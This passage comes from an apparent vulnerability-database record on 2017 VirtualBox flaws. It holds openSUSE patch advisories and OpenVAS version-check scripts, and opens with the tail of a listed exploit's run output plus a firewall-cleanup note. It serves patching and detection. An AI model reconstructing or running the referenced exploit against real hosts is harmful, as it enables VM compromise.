0x7f56350fc5aa\r\nsend_udp_datashift(shift_amount=40, data_length=3092)\r\nsend_udp_datashift(shift_amount=36, data_length=3092)\r\nsending packet2, ip_off=0xa, ip_id=0x27\r\ndid that work?\r\nsystemf: <<<iptables -D OUTPUT -o enp0s3 -j DROP>>>\r\n==================================================================\r\n \r\nIf the exploit crashes, you'll have to remove the firewall rule the\r\nexploit added with `iptables -D OUTPUT -o {interface} -j DROP` inside\r\nthe VM to restore network connectivity.\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/27646", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2017-05-02T13:19:23", 
"bulletinFamily": "unix", "description": "This update for virtualbox to version 5.1.22 fixes the following issues:\n\n These security issues were fixed (bsc#1034854):\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. 
Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox.\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows high privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox.\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Difficult to\n exploit vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle VM VirtualBox\n accessible data.\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Difficult to exploit\n vulnerability allows high privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. 
Successful attacks of this vulnerability can result in\n unauthorized read access to a subset of Oracle VM VirtualBox accessible\n data.\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows unauthenticated attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Oracle VM VirtualBox as well as unauthorized update,\n insert or delete access to some of Oracle VM VirtualBox accessible data\n and unauthorized read access to a subset of Oracle VM VirtualBox\n accessible data.\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. 
Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Oracle VM VirtualBox as well as unauthorized update,\n insert or delete access to some of Oracle VM VirtualBox accessible data\n and unauthorized read access to a subset of Oracle VM VirtualBox\n accessible data.\n\n These non-security issues were fixed:\n\n - GUI: don't check if the Extension Pack is up-to-date if the user is\n about to install a new Extension Pack\n - GUI: fixed a possible crash when switching a multi-monitor VM into\n full-screen or seamless mode\n - GUI: several mini-toolbar fixes in full-screen / seamless mode\n - GUI: don't crash on restoring defaults in the appliance import dialog\n - ICH9: fix for Windows guests with a huge amount (more than 64G) of guest\n memory\n - BIOS: fixed El Torito hard disk emulation geometry calculation\n - VMM: fixed VERR_IEM_INSTR_NOT_IMPLEMENTED Guru Meditation under certain\n conditions\n - Storage: fixed a potential hang under rare circumstances\n - Storage: fixed a potential crash under rare circumstances (asynchronous\n I/O disabled or during maintenance file operations like merging\n snapshots)\n - Linux hosts: make the ALSA backend work again as well as loading the GL\n libraries on certain hosts\n - Linux Additions: fixed mount.vboxsf symlink problem\n\n", "modified": "2017-05-02T15:09:19", "published": "2017-05-02T15:09:19", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00002.html", "id": "OPENSUSE-SU-2017:1142-1", "title": "Security update for virtualbox (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-02T13:19:23", "bulletinFamily": "unix", "description": "This update to virtualbox 5.0.40 fixes the following issues:\n\n These security issues were fixed (bsc#1034854):\n\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). 
Difficult to exploit\n vulnerability allows high privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized read access to a subset of Oracle VM VirtualBox accessible\n data.\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Difficult to\n exploit vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle VM VirtualBox\n accessible data.\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows unauthenticated attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Oracle VM VirtualBox as well as unauthorized update,\n insert or delete access to some of Oracle VM VirtualBox accessible data\n and unauthorized read access to a subset of Oracle VM VirtualBox\n accessible data.\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. 
Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Oracle VM VirtualBox as well as unauthorized update,\n insert or delete access to some of Oracle VM VirtualBox accessible data\n and unauthorized read access to a subset of Oracle VM VirtualBox\n accessible data.\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows high privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox.\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). 
Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox. These non-security issues were fixed:\n\n - Storage: fixed a potential hang under rare circumstances\n - Storage: fixed a potential crash under rare circumstances (asynchronous\n I/O disabled or during maintenance file operations like merging\n snapshots)\n - Storage: fixed a potential crash under rare circumstances (no\n asynchronous I/O or during maintenance file operations like merging\n snapshots)\n - Linux hosts: make the ALSA backend work again as well as Loading the GL\n libraries on certain hosts\n - GUI: don't crash on restoring defaults in the appliance import dialog\n\n", "modified": "2017-05-02T15:09:05", "published": "2017-05-02T15:09:05", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00001.html", "id": "OPENSUSE-SU-2017:1141-1", "title": "Security update for virtualbox (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2019-07-17T14:19:34", "bulletinFamily": "scanner", "description": "This host is installed with Oracle VM\n VirtualBox and is prone to multiple unspecified vulnerabilities.", "modified": "2019-07-05T00:00:00", 
"published": "2017-04-25T00:00:00", "id": "OPENVAS:1361412562310811010", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811010", "title": "Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:vm_virtualbox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811010\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3576\", \"CVE-2017-3558\",\n \"CVE-2017-3587\", \"CVE-2017-3559\", \"CVE-2017-3575\", \"CVE-2017-3513\");\n script_bugtraq_id(97730, 97732, 97759, 97744, 97750, 97739, 97755, 97736);\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n 
script_tag(name:\"creation_date\", value:\"2017-04-25 15:14:16 +0530 (Tue, 25 Apr 2017)\");\n script_name(\"Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle VM\n VirtualBox and is prone to multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n unspecified errors in the 'Core' and 'Shared Folder' sub-component of the\n application.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to have an impact on availability, confidentiality and integrity.\");\n\n script_tag(name:\"affected\", value:\"VirtualBox versions prior to 5.0.38\n and prior to 5.1.20 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Oracle VirtualBox 5.0.38 or 5.1.20 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_sun_virtualbox_detect_lin.nasl\");\n script_mandatory_keys(\"Sun/VirtualBox/Lin/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!virtualVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(virtualVer =~ \"^(5\\.0)\")\n{\n if(version_is_less(version:virtualVer, test_version:\"5.0.38\"))\n {\n fix = \"5.0.38\";\n VULN = TRUE;\n }\n}\n\nelse if(virtualVer =~ \"^(5\\.1)\")\n{\n if(version_is_less(version:virtualVer, test_version:\"5.1.20\"))\n {\n fix = \"5.1.20\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver( 
installed_version:virtualVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:42", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2017-05-03T00:00:00", "id": "OPENVAS:1361412562310851545", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851545", "title": "SuSE Update for virtualbox openSUSE-SU-2017:1142-1 (virtualbox)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2017_1142_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for virtualbox openSUSE-SU-2017:1142-1 (virtualbox)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851545\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-03 06:46:21 +0200 (Wed, 03 May 2017)\");\n script_cve_id(\"CVE-2017-3513\", \"CVE-2017-3538\", \"CVE-2017-3558\", \"CVE-2017-3559\",\n \"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3575\", \"CVE-2017-3576\",\n \"CVE-2017-3587\");\n script_tag(name:\"cvss_base\", value:\"6.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for virtualbox openSUSE-SU-2017:1142-1 (virtualbox)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'virtualbox'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update for virtualbox to version 5.1.22 fixes the following issues:\n\n These security issues were fixed (bsc#1034854):\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. 
Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox.\n\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows high privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. 
Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox.\n\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Difficult to\n exploit vulnerabi ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"virtualbox on openSUSE Leap 42.2\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:1142_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSELeap42.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"python-virtualbox\", rpm:\"python-virtualbox~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-virtualbox-debuginfo\", rpm:\"python-virtualbox-debuginfo~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-debuginfo\", rpm:\"virtualbox-debuginfo~5.1.22~19.10.1\", 
rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-debugsource\", rpm:\"virtualbox-debugsource~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-devel\", rpm:\"virtualbox-devel~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default\", rpm:\"virtualbox-guest-kmp-default~5.1.22_k4.4.57_18.3~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default-debuginfo\", rpm:\"virtualbox-guest-kmp-default-debuginfo~5.1.22_k4.4.57_18.3~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-tools-debuginfo\", rpm:\"virtualbox-guest-tools-debuginfo~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-x11\", rpm:\"virtualbox-guest-x11~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-x11-debuginfo\", rpm:\"virtualbox-guest-x11-debuginfo~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-host-kmp-default\", rpm:\"virtualbox-host-kmp-default~5.1.22_k4.4.57_18.3~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-host-kmp-default-debuginfo\", 
rpm:\"virtualbox-host-kmp-default-debuginfo~5.1.22_k4.4.57_18.3~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-qt\", rpm:\"virtualbox-qt~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-qt-debuginfo\", rpm:\"virtualbox-qt-debuginfo~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-websrv\", rpm:\"virtualbox-websrv~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-websrv-debuginfo\", rpm:\"virtualbox-websrv-debuginfo~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-desktop-icons\", rpm:\"virtualbox-guest-desktop-icons~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-host-source\", rpm:\"virtualbox-host-source~5.1.22~19.10.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2019-05-29T18:34:43", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2017-05-03T00:00:00", "id": "OPENVAS:1361412562310851546", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851546", "title": "SuSE Update for virtualbox openSUSE-SU-2017:1141-1 (virtualbox)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2017_1141_1.nasl 12381 2018-11-16 11:16:30Z 
cfischer $\n#\n# SuSE Update for virtualbox openSUSE-SU-2017:1141-1 (virtualbox)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851546\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-03 06:46:40 +0200 (Wed, 03 May 2017)\");\n script_cve_id(\"CVE-2017-3513\", \"CVE-2017-3538\", \"CVE-2017-3558\", \"CVE-2017-3559\",\n \"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3575\", \"CVE-2017-3576\",\n \"CVE-2017-3587\");\n script_tag(name:\"cvss_base\", value:\"6.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for virtualbox openSUSE-SU-2017:1141-1 (virtualbox)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'virtualbox'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n 
script_tag(name:\"insight\", value:\"This update to virtualbox 5.0.40 fixes the following issues:\n\n These security issues were fixed (bsc#1034854):\n\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Difficult to exploit\n vulnerability allows high privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized read access to a subset of Oracle VM VirtualBox accessible\n data.\n\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Shared Folder). Difficult to\n exploit vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data\n or all Oracle VM VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle VM VirtualBox\n accessible data.\n\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows unauthenticated attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Oracle VM VirtualBox as well as unauthorized update,\n insert or delete access to some of Oracle VM VirtualBox accessible data\n and unauthorized read access to a subset of Oracle VM VirtualBox\n accessible data.\n\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). 
Easily exploitable\n vulnerability allows low privileged attacker with logon to the\n infrastructure where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Oracle VM VirtualBox as well as unauthorized update,\n insert or delete access to some of Oracle VM VirtualBox accessible data\n and unauthorized read access to a subset of Oracle VM VirtualBox\n accessible data.\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox component of\n Oracle Virtualization (subcomponent: Core). Easily exploitable\n vulnerability allows low privilege ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"virtualbox on openSUSE Leap 42.1\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:1141_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 